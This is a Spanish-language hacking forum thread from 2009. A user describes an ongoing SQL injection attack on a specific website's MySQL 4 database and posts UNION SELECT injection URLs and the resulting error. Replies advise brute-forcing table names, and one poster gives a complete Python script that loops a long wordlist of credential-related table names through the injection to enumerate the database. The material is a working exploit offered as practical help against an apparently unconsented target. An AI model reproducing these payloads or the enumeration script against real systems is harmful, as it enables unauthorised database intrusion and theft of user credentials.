Autor
|
Tema: (DUDA) Haciendo SQL Injection. (Leído 9,879 veces)
|
flowskull
Desconectado
Mensajes: 3
|
Buenas antes que nada un saludo a todos, mi problema es el siguiente, estoy haciendo "SQL Injection" a una web y me quede estancado por asi decirlo en un paso: Informacion que he logrado sacar.Numero de tablas = 7 Mysql Version = 4.1.20 Nombre de la db = emotiu Usuario de la db = emotiu@localhost tables visibles = 4,5,6 Ok todo bien hasta alli, pero ahora que hago? intente con éste codigo:http://www.prueba.com/html/noticia.php?id=-11+union+select+1,2,3,group_concat(table_name),5,6,7+from+information_schema.tables Y el resultado es:¡¡ERROR!!: SELECT command denied to user 'emotiu'@'localhost' for table 'tables' SELECT * FROM noticias WHERE id_noticia = -11 union select 1,2,3,group_concat(table_name),5,6,7 from information_schema.tables Mi duda está muy clara, si probando de esa forma me da acceso denegado, entonces que puedo usar para lograr saber almenos las tablas, o una recomendacion logica qe me den, creo que tienen la info suficiente jeje un saludo.
|
|
|
En línea
|
|
|
|
Darioxhcx
Desconectado
Mensajes: 2.294
|
Mysql Version = 4.1.20
esa version no soporta information_schema hasta donde se... saludos
|
|
|
En línea
|
|
|
|
flowskull
Desconectado
Mensajes: 3
|
bueno entonces podrias darme algunos tips?
|
|
|
En línea
|
|
|
|
flowskull
Desconectado
Mensajes: 3
|
bueno se supone que si la version 4 no soporta la information_schema y la 5 si.. entonces la 4 es mayor vulnerable cierto? me pueden ayudar?
|
|
|
En línea
|
|
|
|
|
OzX
Desconectado
Mensajes: 406
[NuKe] Team
|
Desde la version 5.x , mysql tiene la db information_schema. Tienes que hacer fuerza bruta para indentificar las tablas. Saludos¡
|
|
|
En línea
|
Undersecurity.net
|
|
|
aagos
Desconectado
Mensajes: 8
|
Hola OzX la fuerza bruta para indentificar las tablas se puede hacer desde la URL o tendria que ser con scripts?
|
|
|
En línea
|
|
|
|
08l00D
Desconectado
Mensajes: 168
|
Hola OzX la fuerza bruta para indentificar las tablas se puede hacer desde la URL o tendria que ser con scripts?
podes hacerlo a mano o con un script ya sea en ruby, python, perl etc... es facil lo unico que tenes que hacer es tener una buena lista con nombres de tablas mas comunes o que sean posible que este y pones todo en un array de cadenas lo que seria en python una 'lista'... y vas abriendo la web en un bucle tipo: http://www.prueba.com/html/noticia.php?id=-11+union+select+1,2,3,4,5,6,7+from+LISTA[ITERADOR] y por cada resultado si por ejemplo la web te tira un Table 'LISTA[ITERADOR]' doesn't exist ... aumentar el iterador en uno y que siga con el bucle hasta que encuentre una con la que no tire el error entonces la imprimis en la pantalla y listo al menos eso haria yo... tambien podes hacer lo mismo pero manualmente ir probando con tablas que se te ocurran pero eso si que es un huevo ...
|
|
|
En línea
|
|
|
|
aagos
Desconectado
Mensajes: 8
|
pues me temo que tendre que hacerlo a mano jajajajja porque no se nada de ruby, python, ni de perl muchas gracias porcierto se sabe de alguna vulnerabilidad conocida en MySQL 5.0.27 ?
|
|
|
En línea
|
|
|
|
08l00D
Desconectado
Mensajes: 168
|
bueno basicamente seria algo asi.... esta en python import urllib2 url = raw_input("Introduce la url + el path vulnerable\n\tejemplo: www.ejemplo.com/xxxx.php?id=\n") tablas = ['admin','tblUsers', 'tbl_users', 'tbl_admin',,'tblAdmin','user','users','username','usernames','usuario', 'name','names','nombre','nombres','usuarios','member','members','admin_table', 'miembro','miembros','membername','admins','administrator', 'administrators','passwd','password','passwords','pass','Pass', 'user_password', 'usua_login','user_passwords','user_name','user_names', 'member_password','mods','mod','moderators','moderator','user_email', 'user_emails','user_mail','user_mails','mail','emails','email','address', 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins', 'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass', 'u_password','nick','nicks','manager','managers','administrador', 'administradores','clave','login_id','pwd','pas','sistema_id', 'sistema_usuario','sistema_password','contraseña','auth','key','senha', 'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys', 'fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors', 'accounts','account','accnts','accnt','customers','customer','membres','administrateur','utilisateur','utilisateurs', 'password','passwords','amministratore','god','God','authors','autores','membername','usuario','Users','Admin','Members', 'Miemberos','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER', 'username', 'user_hash'] inyeccion = "-11+union+select+1,2,3,4,5,6,7+from+" for tabla in tablas: web = urllib2.urlopen(url + inyeccion + tabla) source = web.read() error = "Table 'emotiu." + str(tabla) + "' doesn't exist" if not error in source: print "Tabla %s se encuentra en la base de datos" % tabla print "Fin xd"
Por cierto la lista de tablas esa no es mia la saque de otro script que vi por ahi ....
|
|
« Última modificación: 1 Agosto 2009, 01:36 am por 08l00D »
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Duda con SQL injection
« 1 2 »
Nivel Web
|
Leber
|
14
|
12,456
|
27 Abril 2008, 15:44 pm
por pedrox@
|
|
|
Duda haciendo un crypter
Programación Visual Basic
|
aaronduran2
|
7
|
3,265
|
27 Septiembre 2008, 13:25 pm
por aaronduran2
|
|
|
Una duda de SQL injection
Nivel Web
|
baZZ
|
7
|
5,732
|
16 Junio 2009, 00:10 am
por baZZ
|
|
|
duda con sql injection
Nivel Web
|
papanata
|
2
|
2,888
|
3 Septiembre 2009, 09:46 am
por papanata
|
|
|
Duda haciendo resize a una imagen...
.NET (C#, VB.NET, ASP)
|
TrashAmbishion
|
3
|
2,427
|
15 Septiembre 2016, 03:52 am
por TrashAmbishion
|
|